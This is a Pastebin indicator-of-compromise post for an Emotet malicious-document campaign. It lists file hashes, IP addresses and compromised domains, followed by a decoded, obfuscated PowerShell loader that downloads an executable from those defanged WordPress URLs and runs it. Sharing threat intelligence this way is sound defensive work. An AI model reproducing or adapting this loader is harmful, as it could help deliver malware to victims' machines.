Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- SHA256:
- 44b8c2c694e595c5c101cd70e1c07cb585b19db23cfd60049e3fe445f6df525d
- 6e9b1ad824b0bc35792a2ec92fabb0456af70c654e99e5f6d0067903f3c771ce
- 52b725e19110d9c7b614784f84880a6f9e181c033ba521b012662ada81fc1cb7
- 239b0c4f5e150bac96fff321ed672e0772718018ae715db9d4feb0b59879fbb7
- bdc6eceba4b95bac120bfeb41f35e7df45c0f48d1188331f7085b65431d29398
- b06fa4a03274712b0d1bea0d2a5d1afc2c71541acb80b1054d31b661b67514ea
- 16e038d9e33c53b2a57906401ffe6a6980d0b45d153610dc7b2b7e4257a3c6e7
- b16f77072d09279154089c427fc5151bc941751fde11d2e043d11f89f579d009
- 96c9ac5b39fd07ad898f381241ff17d003a4a90f6f87ab45d8dd74634ca67b13
- f72ce180f7fc38f18740d42dd0b6684e21e94348fe952221eb9a8f3c01400eb6
- f4a1c1efb7093c25364d501dddf8dac96dccf05f85d85d2947f5a5d2a687280d
- 120d8c2be86854307eaeb869f66dd85a90512e616a6390ebaf05c781ee48a6b3
- 59ab542232a464397ef49e4cf9c531e4570fece1fd69a64bf56b7abc56e3d859
- 8cc695377181d100d98ff6883804563f0a475e76454a98fe4c083005337e54ec
- 38de02c634244bac2df0a0e467d1eaee89645b9f33c1927e04ccf08761264d47
- 7f3f157b6efccbe88e544e49aa6b5571503e8f8e2d187cb88f30a38860b1537b
- IPs:
- 101.50.1.19
- 104.238.124.62
- 104.42.146.120
- 132.148.143.123
- 13.234.36.77
- 192.34.63.244
- 44.230.149.196
- 47.241.2.252
- 88.99.211.112
- 99.198.101.186
- Domains:
- af.rologyx.com
- beeptool.com
- besanads.com
- blog.newforceltd.com
- c8xtt.com
- dpsoma.com
- samontime.com
- scoopmagazines.com
- sindobatam.com
- techycivil.com
- hxxps://samontime.com/wp-content/M7cidlobkp899135/
- hxxp://techycivil.com/wp-content/wvr/
- hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
- hxxp://besanads.com/wp-admin/PbgJVpz/
- hxxp://sindobatam.com/cgi-bin/5yq6g129/
- hxxp://blog.newforceltd.com/wp-content/uploads/qf/
- hxxps://c8xtt.com/wb/jDDwc504077/
- hxxps://af.rologyx.com/sites/i4vBd0msh/
- hxxps://beeptool.com/wp-admin/zyZ67961/
- hxxps://dpsoma.com/crm/vUQz884/
- Decoded Base64 Powershell:
- $NMROOzgm='KLNDVdmf';
- [Net.ServicePointManager]::"S`ec`URITYpr`OtOcoL" = 'tls12, tls11, tls';
- $BVFWBptf = '413';
- $EPVRZkhp='HPXXCocy';
- $DUNQDywm=$env:userprofile+'\'+$BVFWBptf+'.exe';
- $OGNJRema='XZBKWeta';
- $CURKOwif=&('ne'+'w-obje'+'ct') NET.WebClIent;
- $USUNLijk='hxxps://samontime.com/wp-content/M7cidlobkp899135/
- hxxp://techycivil.com/wp-content/wvr/
- hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
- hxxp://besanads.com/wp-admin/PbgJVpz/
- hxxp://sindobatam.com/cgi-bin/5yq6g129/'."sp`lIt"([char]42);
- $RUSDGkte='NNLPTetq';
- foreach($ERMRHnpl in $USUNLijk){try{$CURKOwif."doWnLoa`DfI`LE"($ERMRHnpl, $DUNQDywm);
- $MUYRFyaj='KXTSEbek';
- If ((&('Get-It'+'e'+'m') $DUNQDywm)."leng`Th" -ge 23021) {([wmiclass]'win32_Process')."cr`e`ATe"($DUNQDywm);
- $LADQMaym='IGWRFahg';
- break;
- $APTDWujg='UJKLIasf'}}catch{}}$JELRGlcb='NGNRWvsk'$NCVHLgby='CATPTxiv';
- [Net.ServicePointManager]::"s`EcUr`it`yPROto`cOl" = 'tls12, tls11, tls';
- $UWFTVhcw = '119';
- $SPMIUcfh='ASUNKxfy';
- $NQEKRoch=$env:userprofile+'\'+$UWFTVhcw+'.exe';
- $FFYJTczg='FDHKZevd';
- $QALMYzjt=.('n'+'ew-obj'+'ect') neT.WeBClIEnt;
- $DGBLBnzd='hxxp://blog.newforceltd.com/wp-content/uploads/qf/
- hxxps://c8xtt.com/wb/jDDwc504077/
- hxxps://af.rologyx.com/sites/i4vBd0msh/
- hxxps://beeptool.com/wp-admin/zyZ67961/
- hxxps://dpsoma.com/crm/vUQz884/'."SP`LIT"([char]42);
- $BTBFFziy='INJRNzop';
- foreach($TOCQGwsa in $DGBLBnzd){try{$QALMYzjt."d`owNloA`df`ilE"($TOCQGwsa, $NQEKRoch);
- $IJWJIola='KPTQRhne';
- If ((.('Get-'+'Item') $NQEKRoch)."LENg`Th" -ge 24008) {([wmiclass]'win32_Process')."CrE`A`TE"($NQEKRoch);
- $AZZBUirs='NPIWJhnu';
- break;
- $RKNTFvxj='RVBDJuvp'}}catch{}}$JHBBRvdm='CTJIEman'
Add Comment
Please, Sign In to add comment